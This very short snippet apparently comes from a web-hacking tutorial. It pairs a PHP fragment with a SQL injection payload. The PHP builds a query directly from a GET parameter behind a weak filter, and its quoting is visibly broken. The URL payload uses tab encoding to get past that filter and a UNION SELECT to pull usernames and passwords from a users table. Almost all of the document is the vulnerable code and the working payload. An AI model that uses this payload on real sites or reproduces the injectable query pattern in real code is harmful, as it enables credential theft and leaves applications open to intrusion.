<?php $name = str_replace('/**/','','str_replace(' ','',$_GET['name'])); $query = mysql_query("select * from users where name='$name"); ?>
http://site.com/index.php?name=union%09select%091,2,CONCAT_WS(':',name,passwd),4,5,6%09from%09users/*